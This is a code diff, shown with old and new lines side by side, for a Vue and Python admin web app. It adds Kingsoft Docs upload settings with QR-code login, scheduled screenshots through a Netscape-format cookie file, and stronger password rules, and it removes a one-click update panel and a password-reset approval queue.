autoApproveEnabled.value = (system.auto_approve_enabled ?? 0) === 1 autoApproveEnabled.value = (system.auto_approve_enabled ?? 0) === 1
autoApproveHourlyLimit.value = system.auto_approve_hourly_limit ?? 10 autoApproveHourlyLimit.value = system.auto_approve_hourly_limit ?? 10
@@ -151,8 +125,16 @@ async function loadAll() {
proxyApiUrl.value = proxy.proxy_api_url || '' proxyApiUrl.value = proxy.proxy_api_url || ''
proxyExpireMinutes.value = proxy.proxy_expire_minutes ?? 3 proxyExpireMinutes.value = proxy.proxy_expire_minutes ?? 3
await loadUpdateInfo({ withLog: false }) kdocsEnabled.value = (system.kdocs_enabled ?? 0) === 1
startUpdatePolling() kdocsDocUrl.value = system.kdocs_doc_url || ''
kdocsDefaultUnit.value = system.kdocs_default_unit || ''
kdocsSheetName.value = system.kdocs_sheet_name || ''
kdocsSheetIndex.value = system.kdocs_sheet_index ?? 0
kdocsUnitColumn.value = (system.kdocs_unit_column || 'A').toUpperCase()
kdocsImageColumn.value = (system.kdocs_image_column || 'D').toUpperCase()
kdocsAdminNotifyEnabled.value = (system.kdocs_admin_notify_enabled ?? 0) === 1
kdocsAdminNotifyEmail.value = system.kdocs_admin_notify_email || ''
kdocsStatus.value = kdocsInfo || {}
} catch { } catch {
// handled by interceptor // handled by interceptor
} finally { } finally {
@@ -196,10 +178,12 @@ async function saveSchedule() {
schedule_time: scheduleTime.value, schedule_time: scheduleTime.value,
schedule_browse_type: scheduleBrowseType.value, schedule_browse_type: scheduleBrowseType.value,
schedule_weekdays: (scheduleWeekdays.value || []).join(','), schedule_weekdays: (scheduleWeekdays.value || []).join(','),
enable_screenshot: scheduleScreenshotEnabled.value ? 1 : 0,
} }
const screenshotText = scheduleScreenshotEnabled.value ? '截图' : '不截图'
const message = scheduleEnabled.value const message = scheduleEnabled.value
? `确定启用定时任务吗?\n\n执行时间: 每天 ${payload.schedule_time}\n执行日期: ${scheduleWeekdayDisplay.value}\n浏览类型: ${payload.schedule_browse_type}\n\n系统将自动执行所有账号的浏览任务(不包含截图)` ? `确定启用定时任务吗?\n\n执行时间: 每天 ${payload.schedule_time}\n执行日期: ${scheduleWeekdayDisplay.value}\n浏览类型: ${payload.schedule_browse_type}\n截图: ${screenshotText}\n\n系统将自动执行所有账号的浏览任务`
: '确定关闭定时任务吗?' : '确定关闭定时任务吗?'
try { try {
@@ -260,6 +244,131 @@ async function saveProxy() {
} }
} }
async function saveKdocsConfig() {
const payload = {
kdocs_enabled: kdocsEnabled.value ? 1 : 0,
kdocs_doc_url: kdocsDocUrl.value.trim(),
kdocs_default_unit: kdocsDefaultUnit.value.trim(),
kdocs_sheet_name: kdocsSheetName.value.trim(),
kdocs_sheet_index: Number(kdocsSheetIndex.value) || 0,
kdocs_unit_column: kdocsUnitColumn.value.trim().toUpperCase(),
kdocs_image_column: kdocsImageColumn.value.trim().toUpperCase(),
kdocs_admin_notify_enabled: kdocsAdminNotifyEnabled.value ? 1 : 0,
kdocs_admin_notify_email: kdocsAdminNotifyEmail.value.trim(),
}
try {
const res = await updateSystemConfig(payload)
ElMessage.success(res?.message || '表格配置已更新')
} catch {
// handled by interceptor
}
}
async function refreshKdocsStatus() {
if (kdocsStatusLoading.value) return
kdocsStatusLoading.value = true
setKdocsHint('正在刷新状态')
try {
kdocsStatus.value = await fetchKdocsStatus({ live: 1 })
setKdocsHint('状态已刷新')
} catch {
setKdocsHint('刷新失败,请稍后重试')
} finally {
kdocsStatusLoading.value = false
}
}
async function pollKdocsStatus() {
try {
const status = await fetchKdocsStatus({ live: 1 })
kdocsStatus.value = status
const loggedIn = status?.logged_in === true || status?.last_login_ok === true
if (loggedIn) {
ElMessage.success('扫码成功,已登录')
setKdocsHint('扫码成功,已登录')
kdocsQrOpen.value = false
stopKdocsPolling()
}
} catch {
// handled by interceptor
}
}
function startKdocsPolling() {
stopKdocsPolling()
kdocsPolling.value = true
setKdocsHint('扫码检测中')
pollKdocsStatus()
kdocsPollingTimer = setInterval(pollKdocsStatus, 2000)
}
function stopKdocsPolling() {
if (kdocsPollingTimer) {
clearInterval(kdocsPollingTimer)
kdocsPollingTimer = null
}
kdocsPolling.value = false
}
async function onFetchKdocsQr() {
if (kdocsQrLoading.value) return
kdocsQrLoading.value = true
setKdocsHint('正在获取二维码')
try {
kdocsQrImage.value = ''
const res = await fetchKdocsQr()
kdocsQrImage.value = res?.qr_image || ''
if (!kdocsQrImage.value) {
if (res?.logged_in) {
ElMessage.success('当前已登录,无需扫码')
setKdocsHint('当前已登录,无需扫码')
await refreshKdocsStatus()
return
}
ElMessage.warning('未获取到二维码')
setKdocsHint('未获取到二维码')
return
}
setKdocsHint('二维码已获取')
kdocsQrOpen.value = true
} catch {
setKdocsHint('获取二维码失败')
} finally {
kdocsQrLoading.value = false
}
}
async function onClearKdocsLogin() {
if (kdocsClearLoading.value) return
kdocsClearLoading.value = true
setKdocsHint('正在清除登录态')
try {
await clearKdocsLogin()
kdocsQrOpen.value = false
kdocsQrImage.value = ''
ElMessage.success('登录态已清除')
setKdocsHint('登录态已清除')
await refreshKdocsStatus()
} catch {
setKdocsHint('清除登录态失败')
} finally {
kdocsClearLoading.value = false
}
}
watch(kdocsQrOpen, (open) => {
if (open) {
startKdocsPolling()
} else {
stopKdocsPolling()
}
})
onBeforeUnmount(() => {
stopKdocsPolling()
})
async function onTestProxy() { async function onTestProxy() {
if (!proxyApiUrl.value.trim()) { if (!proxyApiUrl.value.trim()) {
ElMessage.error('请先输入代理API地址') ElMessage.error('请先输入代理API地址')
@@ -301,49 +410,7 @@ async function saveAutoApprove() {
} }
} }
async function onCheckUpdate() {
updateActionLoading.value = true
try {
const res = await requestUpdateCheck()
ElMessage.success(res?.success ? '已触发检查更新' : '已提交检查请求')
setTimeout(() => loadUpdateInfo({ withLog: false }), 800)
} catch {
// handled by interceptor
} finally {
updateActionLoading.value = false
}
}
async function onRunUpdate() {
const status = updateStatus.value
const remote = status?.remote_commit ? shortCommit(status.remote_commit) : '-'
const buildFlags = updateBuildNoCache.value ? '\n\n构建选项: 强制重建(--no-cache' : ''
try {
await ElMessageBox.confirm(
`确定开始“一键更新”吗?\n\n目标版本: ${remote}${buildFlags}\n\n更新将会重建并重启服务页面可能短暂不可用系统会先备份数据库。`,
'一键更新确认',
{ confirmButtonText: '开始更新', cancelButtonText: '取消', type: 'warning' },
)
} catch {
return
}
updateActionLoading.value = true
try {
const res = await requestUpdateRun({ build_no_cache: updateBuildNoCache.value ? 1 : 0 })
ElMessage.success(res?.message || '已提交更新请求')
startUpdatePolling()
setTimeout(() => loadUpdateInfo(), 800)
} catch {
// handled by interceptor
} finally {
updateActionLoading.value = false
}
}
onMounted(loadAll) onMounted(loadAll)
onBeforeUnmount(stopUpdatePolling)
</script> </script>
<template> <template>
@@ -371,7 +438,7 @@ onBeforeUnmount(stopUpdatePolling)
<el-form-item label="截图最大并发数"> <el-form-item label="截图最大并发数">
<el-input-number v-model="maxScreenshotConcurrent" :min="1" :max="50" /> <el-input-number v-model="maxScreenshotConcurrent" :min="1" :max="50" />
<div class="help">同时进行截图的最大数量每个浏览器约占用 200MB 内存</div> <div class="help">同时进行截图的最大数量wkhtmltoimage 资源占用较低可按需提高</div>
</el-form-item> </el-form-item>
</el-form> </el-form>
@@ -384,6 +451,7 @@ onBeforeUnmount(stopUpdatePolling)
<el-form label-width="130px"> <el-form label-width="130px">
<el-form-item label="启用定时任务"> <el-form-item label="启用定时任务">
<el-switch v-model="scheduleEnabled" /> <el-switch v-model="scheduleEnabled" />
<div class="help">开启后系统会按计划自动执行浏览任务</div>
</el-form-item> </el-form-item>
<el-form-item v-if="scheduleEnabled" label="执行时间"> <el-form-item v-if="scheduleEnabled" label="执行时间">
@@ -404,6 +472,11 @@ onBeforeUnmount(stopUpdatePolling)
</el-checkbox> </el-checkbox>
</el-checkbox-group> </el-checkbox-group>
</el-form-item> </el-form-item>
<el-form-item v-if="scheduleEnabled" label="定时任务截图">
<el-switch v-model="scheduleScreenshotEnabled" />
<div class="help">开启后定时任务执行时会生成截图</div>
</el-form-item>
</el-form> </el-form>
<div class="row-actions"> <div class="row-actions">
@@ -458,88 +531,95 @@ onBeforeUnmount(stopUpdatePolling)
<el-button type="primary" @click="saveAutoApprove">保存注册设置</el-button> <el-button type="primary" @click="saveAutoApprove">保存注册设置</el-button>
</el-card> </el-card>
<el-card shadow="never" :body-style="{ padding: '16px' }" class="card" v-loading="updateLoading"> <el-card shadow="never" :body-style="{ padding: '16px' }" class="card">
<h3 class="section-title">版本与更新</h3> <h3 class="section-title">金山文档上传</h3>
<el-alert <el-form label-width="130px">
v-if="updateStatus?.update_available" <el-form-item label="启用上传">
type="warning" <el-switch v-model="kdocsEnabled" />
:closable="false" <div class="help">表格结构变化时可先关闭避免错误上传</div>
title="检测到新版本:可以在此页面点击“一键更新”升级并自动重启服务。" </el-form-item>
style="margin-bottom: 10px"
/>
<el-alert <el-form-item label="文档链接">
v-if="updateStatusError" <el-input v-model="kdocsDocUrl" placeholder="https://kdocs.cn/..." />
type="info" </el-form-item>
:closable="false"
:title="updateStatusError"
style="margin-bottom: 10px"
/>
<el-descriptions border :column="1" size="small" style="margin-bottom: 10px"> <el-form-item label="默认县区">
<el-descriptions-item label="本地版本(commit)"> <el-input v-model="kdocsDefaultUnit" placeholder="如:道县(用户可覆盖)" />
{{ shortCommit(updateStatus?.local_commit) }} </el-form-item>
</el-descriptions-item>
<el-descriptions-item label="远端版本(commit)">
{{ shortCommit(updateStatus?.remote_commit) }}
</el-descriptions-item>
<el-descriptions-item label="是否有更新">
<el-tag v-if="updateStatus?.update_available" type="danger"></el-tag>
<el-tag v-else type="success"></el-tag>
</el-descriptions-item>
<el-descriptions-item label="工作区修改">
<el-tag v-if="updateStatus?.dirty" type="warning">有未提交修改</el-tag>
<el-tag v-else type="info">干净</el-tag>
</el-descriptions-item>
<el-descriptions-item label="最近检查时间">
{{ updateStatus?.checked_at || '-' }}
</el-descriptions-item>
<el-descriptions-item v-if="updateStatus?.error" label="检查错误">
{{ updateStatus?.error }}
</el-descriptions-item>
</el-descriptions>
<div class="row-actions" style="align-items: center"> <el-form-item label="Sheet名称">
<el-checkbox v-model="updateBuildNoCache">强制重建--no-cache</el-checkbox> <el-input v-model="kdocsSheetName" placeholder="留空使用第一个Sheet" />
<div class="help" style="margin-top: 0">依赖变更或构建异常时建议开启更新会更慢</div> </el-form-item>
</div>
<el-form-item label="Sheet序号">
<el-input-number v-model="kdocsSheetIndex" :min="0" :max="50" />
<div class="help">0 表示第一个Sheet</div>
</el-form-item>
<el-form-item label="县区列">
<el-input v-model="kdocsUnitColumn" placeholder="A" style="max-width: 120px" />
</el-form-item>
<el-form-item label="图片列">
<el-input v-model="kdocsImageColumn" placeholder="D" style="max-width: 120px" />
</el-form-item>
<el-form-item label="管理员通知">
<el-switch v-model="kdocsAdminNotifyEnabled" />
</el-form-item>
<el-form-item label="通知邮箱">
<el-input v-model="kdocsAdminNotifyEmail" placeholder="admin@example.com" />
</el-form-item>
</el-form>
<div class="row-actions"> <div class="row-actions">
<el-button @click="loadUpdateInfo" :disabled="updateActionLoading">刷新更新信息</el-button> <el-button type="primary" @click="saveKdocsConfig">保存表格配置</el-button>
<el-button @click="onCheckUpdate" :loading="updateActionLoading">检查更新</el-button> <el-button
<el-button type="danger" @click="onRunUpdate" :loading="updateActionLoading" :disabled="!updateStatus?.update_available"> :loading="kdocsStatusLoading"
一键更新 :disabled="kdocsActionBusy && !kdocsStatusLoading"
@click="refreshKdocsStatus"
>
刷新状态
</el-button>
<el-button
type="success"
plain
:loading="kdocsQrLoading"
:disabled="kdocsActionBusy && !kdocsQrLoading"
@click="onFetchKdocsQr"
>
获取二维码
</el-button>
<el-button
type="danger"
plain
:loading="kdocsClearLoading"
:disabled="kdocsActionBusy && !kdocsClearLoading"
@click="onClearKdocsLogin"
>
清除登录
</el-button> </el-button>
</div> </div>
<el-divider content-position="left">最近一次更新结果</el-divider> <div class="help">
<el-descriptions v-if="updateResult" border :column="1" size="small" style="margin-bottom: 10px"> 登录状态
<el-descriptions-item label="job_id">{{ updateResult.job_id }}</el-descriptions-item> <span v-if="kdocsStatus.last_login_ok === true">已登录</span>
<el-descriptions-item label="状态"> <span v-else-if="kdocsStatus.login_required">需要扫码</span>
<el-tag v-if="updateResult.status === 'running'" type="warning">运行中</el-tag> <span v-else>未知</span>
<el-tag v-else-if="updateResult.status === 'success'" type="success">成功</el-tag> · 待上传 {{ kdocsStatus.queue_size || 0 }}
<el-tag v-else type="danger">失败</el-tag> <span v-if="kdocsStatus.last_error">· 最近错误{{ kdocsStatus.last_error }}</span>
</el-descriptions-item> </div>
<el-descriptions-item label="阶段">{{ updateResult.stage || '-' }}</el-descriptions-item> <div v-if="kdocsActionHint" class="help">操作提示{{ kdocsActionHint }}</div>
<el-descriptions-item label="开始时间">{{ updateResult.started_at || '-' }}</el-descriptions-item>
<el-descriptions-item label="结束时间">{{ updateResult.finished_at || '-' }}</el-descriptions-item>
<el-descriptions-item label="耗时(秒)">{{ updateResult.duration_seconds ?? '-' }}</el-descriptions-item>
<el-descriptions-item label="更新前(commit)">{{ shortCommit(updateResult.from_commit) }}</el-descriptions-item>
<el-descriptions-item label="更新后(commit)">{{ shortCommit(updateResult.to_commit) }}</el-descriptions-item>
<el-descriptions-item label="健康检查">
<span v-if="updateResult.health_ok === true">通过{{ updateResult.health_message }}</span>
<span v-else-if="updateResult.health_ok === false">失败{{ updateResult.health_message }}</span>
<span v-else>-</span>
</el-descriptions-item>
<el-descriptions-item v-if="updateResult.error" label="错误">{{ updateResult.error }}</el-descriptions-item>
</el-descriptions>
<div v-else class="help">暂无更新记录</div>
<el-divider content-position="left">更新日志</el-divider>
<div class="help" v-if="updateLogTruncated">日志过长仅展示末尾内容</div>
<el-input v-model="updateLog" type="textarea" :rows="10" readonly placeholder="暂无日志" />
</el-card> </el-card>
<el-dialog v-model="kdocsQrOpen" title="扫码登录" width="min(420px, 92vw)">
<div class="kdocs-qr">
<img v-if="kdocsQrImage" :src="`data:image/png;base64,${kdocsQrImage}`" alt="KDocs QR" />
<div class="help">请使用管理员微信扫码登录</div>
</div>
</el-dialog>
</div> </div>
</template> </template>
@@ -561,6 +641,22 @@ onBeforeUnmount(stopUpdatePolling)
font-weight: 800; font-weight: 800;
} }
.kdocs-qr {
display: flex;
flex-direction: column;
align-items: center;
gap: 12px;
}
.kdocs-qr img {
width: 260px;
max-width: 100%;
border: 1px solid var(--app-border);
border-radius: 8px;
padding: 8px;
background: #fff;
}
.help { .help {
margin-top: 6px; margin-top: 6px;
font-size: 12px; font-size: 12px;

View File

@@ -11,19 +11,14 @@ import {
removeUserVip, removeUserVip,
setUserVip, setUserVip,
} from '../api/users' } from '../api/users'
import { approvePasswordReset, fetchPasswordResets, rejectPasswordReset } from '../api/passwordResets'
import { parseSqliteDateTime } from '../utils/datetime' import { parseSqliteDateTime } from '../utils/datetime'
import { validatePasswordStrength } from '../utils/password' import { validatePasswordStrength } from '../utils/password'
const refreshStats = inject('refreshStats', null) const refreshStats = inject('refreshStats', null)
const refreshNavBadges = inject('refreshNavBadges', null)
const loading = ref(false) const loading = ref(false)
const users = ref([]) const users = ref([])
const resetLoading = ref(false)
const passwordResets = ref([])
function isVip(user) { function isVip(user) {
const expire = user?.vip_expire_time const expire = user?.vip_expire_time
if (!expire) return false if (!expire) return false
@@ -58,21 +53,8 @@ async function loadUsers() {
} }
} }
async function loadResets() {
resetLoading.value = true
try {
const list = await fetchPasswordResets()
passwordResets.value = Array.isArray(list) ? list : []
} catch {
passwordResets.value = []
} finally {
resetLoading.value = false
}
}
async function refreshAll() { async function refreshAll() {
await Promise.all([loadUsers(), loadResets()]) await loadUsers()
await refreshNavBadges?.({ pendingResets: passwordResets.value.length })
} }
async function onEnableUser(row) { async function onEnableUser(row) {
@@ -117,48 +99,6 @@ async function onDisableUser(row) {
} }
} }
async function onApproveReset(row) {
try {
await ElMessageBox.confirm(`确定批准「${row.username}」的密码重置申请吗?`, '批准重置', {
confirmButtonText: '批准',
cancelButtonText: '取消',
type: 'success',
})
} catch {
return
}
try {
const res = await approvePasswordReset(row.id)
ElMessage.success(res?.message || '密码重置申请已批准')
await loadResets()
await refreshNavBadges?.({ pendingResets: passwordResets.value.length })
} catch {
// handled by interceptor
}
}
async function onRejectReset(row) {
try {
await ElMessageBox.confirm(`确定拒绝「${row.username}」的密码重置申请吗?`, '拒绝重置', {
confirmButtonText: '拒绝',
cancelButtonText: '取消',
type: 'warning',
})
} catch {
return
}
try {
const res = await rejectPasswordReset(row.id)
ElMessage.success(res?.message || '密码重置申请已拒绝')
await loadResets()
await refreshNavBadges?.({ pendingResets: passwordResets.value.length })
} catch {
// handled by interceptor
}
}
async function onDelete(row) { async function onDelete(row) {
try { try {
await ElMessageBox.confirm( await ElMessageBox.confirm(
@@ -338,27 +278,6 @@ onMounted(refreshAll)
</el-table> </el-table>
</div> </div>
</el-card> </el-card>
<el-card shadow="never" :body-style="{ padding: '16px' }" class="card">
<h3 class="section-title">密码重置申请</h3>
<div class="table-wrap">
<el-table :data="passwordResets" v-loading="resetLoading" style="width: 100%">
<el-table-column prop="id" label="申请ID" width="90" />
<el-table-column prop="username" label="用户名" min-width="200" />
<el-table-column prop="email" label="邮箱" min-width="220">
<template #default="{ row }">{{ row.email || '-' }}</template>
</el-table-column>
<el-table-column prop="created_at" label="申请时间" min-width="180" />
<el-table-column label="操作" width="180" fixed="right">
<template #default="{ row }">
<el-button type="success" size="small" @click="onApproveReset(row)">批准</el-button>
<el-button type="danger" size="small" @click="onRejectReset(row)">拒绝</el-button>
</template>
</el-table-column>
</el-table>
</div>
<div class="help app-muted">当未启用邮件找回密码时用户会提交申请由管理员在此处处理</div>
</el-card>
</div> </div>
</template> </template>

View File

@@ -8,6 +8,7 @@ const FeedbacksPage = () => import('../pages/FeedbacksPage.vue')
const LogsPage = () => import('../pages/LogsPage.vue') const LogsPage = () => import('../pages/LogsPage.vue')
const AnnouncementsPage = () => import('../pages/AnnouncementsPage.vue') const AnnouncementsPage = () => import('../pages/AnnouncementsPage.vue')
const EmailPage = () => import('../pages/EmailPage.vue') const EmailPage = () => import('../pages/EmailPage.vue')
const SecurityPage = () => import('../pages/SecurityPage.vue')
const SystemPage = () => import('../pages/SystemPage.vue') const SystemPage = () => import('../pages/SystemPage.vue')
const SettingsPage = () => import('../pages/SettingsPage.vue') const SettingsPage = () => import('../pages/SettingsPage.vue')
@@ -25,6 +26,7 @@ const routes = [
{ path: '/logs', name: 'logs', component: LogsPage }, { path: '/logs', name: 'logs', component: LogsPage },
{ path: '/announcements', name: 'announcements', component: AnnouncementsPage }, { path: '/announcements', name: 'announcements', component: AnnouncementsPage },
{ path: '/email', name: 'email', component: EmailPage }, { path: '/email', name: 'email', component: EmailPage },
{ path: '/security', name: 'security', component: SecurityPage },
{ path: '/system', name: 'system', component: SystemPage }, { path: '/system', name: 'system', component: SystemPage },
{ path: '/settings', name: 'settings', component: SettingsPage }, { path: '/settings', name: 'settings', component: SettingsPage },
], ],

View File

@@ -2,7 +2,7 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
""" """
API 浏览器 - 用纯 HTTP 请求实现浏览功能 API 浏览器 - 用纯 HTTP 请求实现浏览功能
Playwright 快 30-60 倍 传统浏览器自动化快 30-60 倍
""" """
import requests import requests
@@ -44,6 +44,27 @@ except Exception:
_API_DIAGNOSTIC_SLOW_MS = max(0, _API_DIAGNOSTIC_SLOW_MS) _API_DIAGNOSTIC_SLOW_MS = max(0, _API_DIAGNOSTIC_SLOW_MS)
_cookie_domain_fallback = urlsplit(BASE_URL).hostname or "postoa.aidunsoft.com" _cookie_domain_fallback = urlsplit(BASE_URL).hostname or "postoa.aidunsoft.com"
_COOKIE_JAR_MAX_AGE_SECONDS = 24 * 60 * 60
def get_cookie_jar_path(username: str) -> str:
"""获取截图用的 cookies 文件路径Netscape Cookie 格式)"""
import hashlib
os.makedirs(COOKIES_DIR, exist_ok=True)
filename = hashlib.sha256(username.encode()).hexdigest()[:32] + ".cookies.txt"
return os.path.join(COOKIES_DIR, filename)
def is_cookie_jar_fresh(cookie_path: str, max_age_seconds: int = _COOKIE_JAR_MAX_AGE_SECONDS) -> bool:
"""判断 cookies 文件是否存在且未过期"""
if not cookie_path or not os.path.exists(cookie_path):
return False
try:
file_age = time.time() - os.path.getmtime(cookie_path)
return file_age <= max(0, int(max_age_seconds or 0))
except Exception:
return False
_api_browser_instances: "weakref.WeakSet[APIBrowser]" = weakref.WeakSet() _api_browser_instances: "weakref.WeakSet[APIBrowser]" = weakref.WeakSet()
@@ -102,37 +123,36 @@ class APIBrowser:
"""记录日志""" """记录日志"""
if self.log_callback: if self.log_callback:
self.log_callback(message) self.log_callback(message)
def save_cookies_for_playwright(self, username: str): def save_cookies_for_screenshot(self, username: str):
"""保存cookies供Playwright使用""" """保存 cookies 供 wkhtmltoimage 使用Netscape Cookie 格式)"""
import os cookies_path = get_cookie_jar_path(username)
import json
import hashlib
os.makedirs(COOKIES_DIR, exist_ok=True)
# 安全修复使用SHA256代替MD5作为文件名哈希
filename = hashlib.sha256(username.encode()).hexdigest()[:32] + '.json'
cookies_path = os.path.join(COOKIES_DIR, filename)
try: try:
# 获取requests session的cookies lines = [
cookies_list = [] "# Netscape HTTP Cookie File",
"# This file was generated by zsglpt",
]
for cookie in self.session.cookies: for cookie in self.session.cookies:
cookies_list.append({ domain = cookie.domain or _cookie_domain_fallback
'name': cookie.name, include_subdomains = "TRUE" if domain.startswith(".") else "FALSE"
'value': cookie.value, path = cookie.path or "/"
'domain': cookie.domain or _cookie_domain_fallback, secure = "TRUE" if getattr(cookie, "secure", False) else "FALSE"
'path': cookie.path or '/', expires = int(getattr(cookie, "expires", 0) or 0)
}) lines.append(
"\t".join(
[
domain,
include_subdomains,
path,
secure,
str(expires),
cookie.name,
cookie.value,
]
)
)
# Playwright storage_state 格式 with open(cookies_path, "w", encoding="utf-8") as f:
storage_state = { f.write("\n".join(lines) + "\n")
'cookies': cookies_list,
'origins': []
}
with open(cookies_path, 'w', encoding='utf-8') as f:
json.dump(storage_state, f)
self.log(f"[API] Cookies已保存供截图使用") self.log(f"[API] Cookies已保存供截图使用")
return True return True

View File

@@ -30,11 +30,6 @@ export async function forgotPassword(payload) {
return data return data
} }
export async function requestPasswordReset(payload) {
const { data } = await publicApi.post('/reset_password_request', payload)
return data
}
export async function confirmPasswordReset(payload) { export async function confirmPasswordReset(payload) {
const { data } = await publicApi.post('/reset-password-confirm', payload) const { data } = await publicApi.post('/reset-password-confirm', payload)
return data return data

View File

@@ -30,3 +30,12 @@ export async function changePassword(payload) {
return data return data
} }
export async function fetchKdocsSettings() {
const { data } = await publicApi.get('/user/kdocs')
return data
}
export async function updateKdocsSettings(payload) {
const { data } = await publicApi.post('/user/kdocs', payload)
return data
}

View File

@@ -11,10 +11,13 @@ import {
changePassword, changePassword,
fetchEmailNotify, fetchEmailNotify,
fetchUserEmail, fetchUserEmail,
fetchKdocsSettings,
unbindEmail, unbindEmail,
updateKdocsSettings,
updateEmailNotify, updateEmailNotify,
} from '../api/settings' } from '../api/settings'
import { useUserStore } from '../stores/user' import { useUserStore } from '../stores/user'
import { validateStrongPassword } from '../utils/password'
const route = useRoute() const route = useRoute()
const router = useRouter() const router = useRouter()
@@ -28,6 +31,56 @@ const announcementOpen = ref(false)
const announcement = ref(null) const announcement = ref(null)
const announcementLoading = ref(false) const announcementLoading = ref(false)
const announcementPageToken = (() => {
try {
const timeOrigin = window.performance?.timeOrigin
if (typeof timeOrigin === 'number' && Number.isFinite(timeOrigin)) return String(timeOrigin)
} catch {
// ignore
}
return String(Date.now())
})()
function announcementOnceKey(announcementId) {
return `announcement_closed_once_${announcementId}`
}
function announcementPermanentKey(announcementId) {
return `announcement_closed_${announcementId}`
}
function wasAnnouncementClosedOnce(announcementId) {
try {
return window.sessionStorage.getItem(announcementOnceKey(announcementId)) === announcementPageToken
} catch {
return false
}
}
function wasAnnouncementClosedPermanently(announcementId) {
try {
return window.localStorage.getItem(announcementPermanentKey(announcementId)) === '1'
} catch {
return false
}
}
function markAnnouncementClosedOnce(announcementId) {
try {
window.sessionStorage.setItem(announcementOnceKey(announcementId), announcementPageToken)
} catch {
// ignore
}
}
function markAnnouncementClosedPermanently(announcementId) {
try {
window.localStorage.setItem(announcementPermanentKey(announcementId), '1')
} catch {
// ignore
}
}
const feedbackOpen = ref(false) const feedbackOpen = ref(false)
const feedbackTab = ref('new') const feedbackTab = ref('new')
const feedbackSubmitting = ref(false) const feedbackSubmitting = ref(false)
@@ -60,6 +113,10 @@ const passwordForm = reactive({
confirm_password: '', confirm_password: '',
}) })
const kdocsLoading = ref(false)
const kdocsSaving = ref(false)
const kdocsUnitValue = ref('')
function syncIsMobile() { function syncIsMobile() {
isMobile.value = Boolean(mediaQuery?.matches) isMobile.value = Boolean(mediaQuery?.matches)
if (!isMobile.value) drawerOpen.value = false if (!isMobile.value) drawerOpen.value = false
@@ -180,7 +237,7 @@ async function openSettings() {
} }
async function loadSettings() { async function loadSettings() {
await Promise.all([loadEmailInfo(), loadEmailNotify()]) await Promise.all([loadEmailInfo(), loadEmailNotify(), loadKdocsSettings()])
} }
async function loadEmailInfo() { async function loadEmailInfo() {
@@ -211,6 +268,30 @@ async function loadEmailNotify() {
} }
} }
async function loadKdocsSettings() {
kdocsLoading.value = true
try {
const data = await fetchKdocsSettings()
kdocsUnitValue.value = data?.kdocs_unit || ''
} catch {
kdocsUnitValue.value = ''
} finally {
kdocsLoading.value = false
}
}
async function saveKdocsSettings() {
kdocsSaving.value = true
try {
await updateKdocsSettings({ kdocs_unit: kdocsUnitValue.value.trim() })
ElMessage.success('已更新表格县区设置')
} catch {
// handled by interceptor
} finally {
kdocsSaving.value = false
}
}
async function onBindEmail() { async function onBindEmail() {
const email = bindEmailValue.value.trim().toLowerCase() const email = bindEmailValue.value.trim().toLowerCase()
if (!email) { if (!email) {
@@ -292,8 +373,9 @@ async function onChangePassword() {
ElMessage.error('请填写完整信息') ElMessage.error('请填写完整信息')
return return
} }
if (String(newPassword).length < 6) { const passwordCheck = validateStrongPassword(newPassword)
ElMessage.error('新密码至少6位') if (!passwordCheck.ok) {
ElMessage.error(passwordCheck.message)
return return
} }
if (newPassword !== confirmPassword) { if (newPassword !== confirmPassword) {
@@ -327,8 +409,8 @@ async function loadAnnouncement() {
const ann = data?.announcement const ann = data?.announcement
if (!ann?.id) return if (!ann?.id) return
const sessionKey = `announcement_closed_${ann.id}` if (wasAnnouncementClosedPermanently(ann.id)) return
if (window.sessionStorage.getItem(sessionKey) === '1') return if (wasAnnouncementClosedOnce(ann.id)) return
announcement.value = ann announcement.value = ann
announcementOpen.value = true announcementOpen.value = true
@@ -341,7 +423,7 @@ async function loadAnnouncement() {
function closeAnnouncementOnce() { function closeAnnouncementOnce() {
const ann = announcement.value const ann = announcement.value
if (ann?.id) window.sessionStorage.setItem(`announcement_closed_${ann.id}`, '1') if (ann?.id) markAnnouncementClosedOnce(ann.id)
announcementOpen.value = false announcementOpen.value = false
} }
@@ -351,6 +433,7 @@ async function dismissAnnouncementPermanently() {
announcementOpen.value = false announcementOpen.value = false
return return
} }
markAnnouncementClosedPermanently(ann.id)
try { try {
const res = await dismissAnnouncement(ann.id) const res = await dismissAnnouncement(ann.id)
if (res?.success) ElMessage.success('已永久关闭') if (res?.success) ElMessage.success('已永久关闭')
@@ -433,6 +516,9 @@ async function dismissAnnouncementPermanently() {
<el-dialog v-model="announcementOpen" width="min(560px, 92vw)" :title="announcement?.title || '系统公告'"> <el-dialog v-model="announcementOpen" width="min(560px, 92vw)" :title="announcement?.title || '系统公告'">
<div class="announcement-body" v-loading="announcementLoading"> <div class="announcement-body" v-loading="announcementLoading">
<div class="announcement-content">{{ announcement?.content || '' }}</div> <div class="announcement-content">{{ announcement?.content || '' }}</div>
<div v-if="announcement?.image_url" class="announcement-image">
<img :src="announcement.image_url" alt="公告图片" loading="lazy" />
</div>
</div> </div>
<template #footer> <template #footer>
<el-button @click="closeAnnouncementOnce">当次关闭</el-button> <el-button @click="closeAnnouncementOnce">当次关闭</el-button>
@@ -562,7 +648,7 @@ async function dismissAnnouncementPermanently() {
<el-form-item label="当前密码"> <el-form-item label="当前密码">
<el-input v-model="passwordForm.current_password" type="password" show-password autocomplete="current-password" /> <el-input v-model="passwordForm.current_password" type="password" show-password autocomplete="current-password" />
</el-form-item> </el-form-item>
<el-form-item label="新密码(至少6位"> <el-form-item label="新密码(至少8位且包含字母和数字">
<el-input v-model="passwordForm.new_password" type="password" show-password autocomplete="new-password" /> <el-input v-model="passwordForm.new_password" type="password" show-password autocomplete="new-password" />
</el-form-item> </el-form-item>
<el-form-item label="确认新密码"> <el-form-item label="确认新密码">
@@ -579,6 +665,24 @@ async function dismissAnnouncementPermanently() {
</div> </div>
</el-tab-pane> </el-tab-pane>
<el-tab-pane label="表格上传" name="kdocs">
<div v-loading="kdocsLoading" class="settings-section">
<el-form label-position="top">
<el-form-item label="县区(可选)">
<el-input v-model="kdocsUnitValue" placeholder="留空使用系统默认县区" />
</el-form-item>
<el-button type="primary" :loading="kdocsSaving" @click="saveKdocsSettings">保存</el-button>
</el-form>
<el-alert
type="info"
:closable="false"
title="自动上传开关在“账号管理”页面设置(测试功能)。"
show-icon
class="settings-hint"
/>
</div>
</el-tab-pane>
<el-tab-pane label="VIP信息" name="vip"> <el-tab-pane label="VIP信息" name="vip">
<div class="settings-section"> <div class="settings-section">
<el-alert <el-alert
@@ -726,6 +830,20 @@ async function dismissAnnouncementPermanently() {
font-size: 14px; font-size: 14px;
} }
.announcement-image {
margin-top: 12px;
